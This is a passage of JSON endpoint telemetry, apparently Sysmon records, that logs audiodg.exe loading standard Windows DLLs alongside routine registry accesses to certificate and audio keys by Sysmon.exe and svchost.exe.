"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "audiodg.exe", - "image_path": "C:\\Windows\\System32\\audiodg.exe", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": 
"C:\\Windows\\System32\\combase.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573975890000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "devobj.dll", - "image_path": "C:\\Windows\\System32\\devobj.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "MMDevAPI.dll", - "image_path": "C:\\Windows\\System32\\MMDevAPI.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": 
"image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976050000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 
2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": 
"C:\\Windows\\System32\\clbcatq.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_value": "Journal", - "timestamp": 131883573976210000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", - "registry_value": "Render", - "timestamp": 131883573976210000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976360000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573976360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"image_load", - "image_name": "WinTypes.dll", - "image_path": "C:\\Windows\\System32\\WinTypes.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976360000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "AudioSes.dll", - "image_path": "C:\\Windows\\System32\\AudioSes.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976360000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "avrt.dll", - "image_path": "C:\\Windows\\System32\\avrt.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976360000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976520000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
